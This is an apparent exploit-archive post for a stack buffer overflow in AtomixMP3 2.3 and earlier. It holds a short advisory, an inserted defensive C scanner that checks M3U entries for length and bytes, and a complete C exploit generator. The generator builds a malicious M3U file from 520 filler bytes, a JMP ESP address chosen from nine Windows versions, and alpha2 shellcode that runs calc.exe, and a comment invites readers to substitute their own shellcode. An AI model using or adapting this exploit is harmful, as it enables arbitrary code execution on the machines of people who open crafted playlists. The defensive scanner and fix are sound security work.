
# Title : AtomixMP3 <= 2.3 Malformed M3U Buffer Overflow Exploit
# Published : 2006-11-30
# Author : Greg Linares


/*
========================================================================
0-day AtomixMP3 <= v2.3 Malformed M3U Buffer Overflow PoC
========================================================================
AtomixMP3 Player/Mixer fails to properly handle large file paths inside
M3U files; the result is a stack-based buffer overflow that allows an
attacker to execute code in the context of the player.
#EXTM3U
#EXTINF:0,TITLE
C: + [BUFFER x 520 bytes] + [JMP] + [SHELLCODE in ESP]

I tried finding a universal jump for this, but due to restricted characters
all the jumps in XAudio.dll and the effects DLL don't work.
Someone probably could find one if they tried hard ;)

Greets to everyone at EEye, Metasploit, Jerome Athias and Expanders :)


Happy Hunting and Happy Holidays to everyone

<insert super awesome leet ascii art here>

November 2006 - Month Of Greg's Media Player Exploits :)
(I'll probably continue it into December)

Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 11/30/2006

*/
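A defender-side counterpart, added here as an example and not part of the advisory or of AtomixMP3: a bounded M3U entry check in C that rejects paths longer than a fixed limit instead of copying them into a fixed-size buffer, plus a scanner that counts playlist entries that are oversized or contain non-printable bytes (the 520-byte path layout described above trips the length check). The limit M3U_MAX_PATH, the function names and the sample playlists are assumptions constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Upper bound accepted for one playlist path. Windows MAX_PATH (260) is the
 * realistic limit for a local media file; this value is an assumption made
 * for the example, not a setting of AtomixMP3. */
#define M3U_MAX_PATH 260

enum m3u_verdict { M3U_OK = 0, M3U_OVERSIZED = 1, M3U_NONPRINTABLE = 2 };

/* Classify one playlist line that has already been stripped of CR/LF.
 * Directive and comment lines (#EXTM3U, #EXTINF:...) are passed through. */
enum m3u_verdict m3u_check_entry(const char *line)
{
    size_t len = strlen(line);
    size_t i;

    if (line[0] == '#')
        return M3U_OK;
    if (len > M3U_MAX_PATH)
        return M3U_OVERSIZED;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)line[i];
        if (!isprint(c) && c != '\t')
            return M3U_NONPRINTABLE;
    }
    return M3U_OK;
}

/* Bounded copy of a path into a fixed-size buffer: the caller passes the
 * real size of dst and gets -1 instead of an overflow when it does not fit.
 * This is the length check the advisory says the player lacks. */
int m3u_copy_path(char *dst, size_t dstsz, const char *line)
{
    size_t len = strlen(line);

    if (dstsz == 0 || len >= dstsz)
        return -1;
    memcpy(dst, line, len + 1);
    return 0;
}

/* Scan an in-memory playlist (\n or \r\n line endings) and return the number
 * of entries that are oversized or contain non-printable bytes. A line too
 * long for the scanner's own buffer is counted rather than copied. */
int m3u_scan(const char *playlist)
{
    char line[1024];
    int flagged = 0;
    const char *p = playlist;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);

        if (len >= sizeof line) {
            flagged++;
        } else {
            memcpy(line, p, len);
            line[len] = '\0';
            if (len > 0 && line[len - 1] == '\r')
                line[len - 1] = '\0';
            if (m3u_check_entry(line) != M3U_OK)
                flagged++;
        }
        p = nl ? nl + 1 : p + len;
    }
    return flagged;
}

/* Constructed sample: a normal two-entry playlist (not a real file). */
static const char SAMPLE_BENIGN[] =
    "#EXTM3U\r\n#EXTINF:0,Track\r\nC:\\Music\\track.mp3\r\n";

/* Build a constructed playlist whose path is "C:\" followed by n_fill
 * filler characters (the advisory describes 520) and scan it.
 * Returns the scan result, or -1 if n_fill does not fit the work buffer. */
int m3u_scan_oversized(size_t n_fill)
{
    static char buf[2048];
    const char *head = "#EXTM3U\r\n#EXTINF:0,Track\r\nC:\\";
    size_t hl = strlen(head);

    if (hl + n_fill + 3 > sizeof buf)
        return -1;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', n_fill);
    memcpy(buf + hl + n_fill, "\r\n", 3);   /* copies the terminating NUL too */
    return m3u_scan(buf);
}

int main(void)
{
    printf("benign playlist: %d flagged\n", m3u_scan(SAMPLE_BENIGN));
    printf("520-byte path:   %d flagged\n", m3u_scan_oversized(520));
    return 0;
}
```

The scanner is the shape of check a mail gateway or endpoint agent can apply to .m3u attachments before a vulnerable player ever opens them; m3u_copy_path is the shape of fix the player itself needs, since it fails closed on length rather than trusting the input.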




#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        FILE *Exploit;
        char buffer[525];
        int JMP;

        /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
        unsigned char scode[] =
        "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
        "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
        "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
        "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
        "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";

        /* replace it with your own shellcode :) */

        printf("\n======================================================================\n");
        printf("AtomixMP3 <= v2.3 M3U Buffer Overflow Exploit\n");
        printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
        printf("Usage: %s <output M3U file> <JMP>\n", argv[0]);
        printf("\n JMP Options\n");
        printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
        printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
        printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
        printf("4 = English Windows 2000 SP 4 User32.dll  <JMP ESP 0x77e3c256>\n");
        printf("5 = French Windows XP Pro SP2  <JMP ESP 0x77d8519f> \n");
        printf("6 = German/Italian/Dutch/Polish Windows XP SP2  <JMP ESP 0x77d873a0> \n");
        printf("7 = Spanish Windows XP Pro SP2 <JMP ESP 0x77d9932f> \n");
        printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29>\n");
        printf("9 = French/Italian/Chinese Windows 2000 Server SP4 <JMP ESP 0x77df4c29>\n");
        printf("====================================================================\n\n\n");

        /* thanks metasploit and jerome for opcodes */

        if (argc < 2) {
                printf("Invalid Number Of Arguments\n");
                return 1;
        }

        /* Binary mode so the explicit "\r\n" line endings and the raw JMP
           bytes reach the file unchanged (text mode would rewrite "\n"). */
        Exploit = fopen(argv[1], "wb");
        if (!Exploit) {
                printf("\nCouldn't Open File!\n");
                return 1;
        }

        /* 520 bytes of filler, as in the layout given in the header comment */
        memset(buffer, 'A', 520);
        buffer[520] = '\0';

        fputs("#EXTM3U\r\n#EXTINF:0,", Exploit);
        fputs("0-day_AtomixMP3_M3U_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", Exploit);
        fputs("C:\\", Exploit);
        fputs(buffer, Exploit);

        /* JMP selection: option 1 when the argument is missing or outside 1..9 */
        JMP = (argc >= 3) ? atoi(argv[2]) : 1;
        if (JMP < 1 || JMP > 9) {
                JMP = 1;
        }

        switch (JMP) {
                case 1:
                        printf("Using English Windows XP SP2 JMP...\n");
                        fputs("\xbc\x41\xdb\x77", Exploit);
                        break;
                case 2:
                        printf("Using English Windows XP SP1 JMP...\n");
                        fputs("\xfc\x18\xd7\x77", Exploit);
                        break;
                case 3:
                        printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
                        fputs("\xdc\x4a\xd7\x77", Exploit);
                        break;
                case 4:
                        printf("Using English Windows 2000 SP 4 JMP...\n");
                        fputs("\x56\xc2\xe3\x77", Exploit);
                        break;
                case 5:
                        printf("Using French Windows XP SP 2 JMP...\n");
                        fputs("\x9f\x51\xd8\x77", Exploit);
                        break;
                case 6:
                        printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n");
                        fputs("\xa0\x73\xd8\x77", Exploit);
                        break;
                case 7:
                        printf("Using Spanish Windows XP SP 2 JMP...\n");
                        fputs("\x2f\x93\xd9\x77", Exploit);
                        break;
                case 8:
                        printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n");
                        fputs("\x29\x4c\xe0\x77", Exploit);
                        break;
                case 9:
                        printf("Using French/Italian/Chinese Windows 2000 Server SP 4 JMP...\n");
                        fputs("\x29\x4c\xdf\x77", Exploit);
                        break;
        }

        /* the alpha2 shellcode is plain printable text, so fputs is enough */
        fputs((const char *)scode, Exploit);
        fputs("\r\n", Exploit);

        printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);

        printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
        printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
        fclose(Exploit);
        return 0;
}

// www.Syue.com [2006-11-30]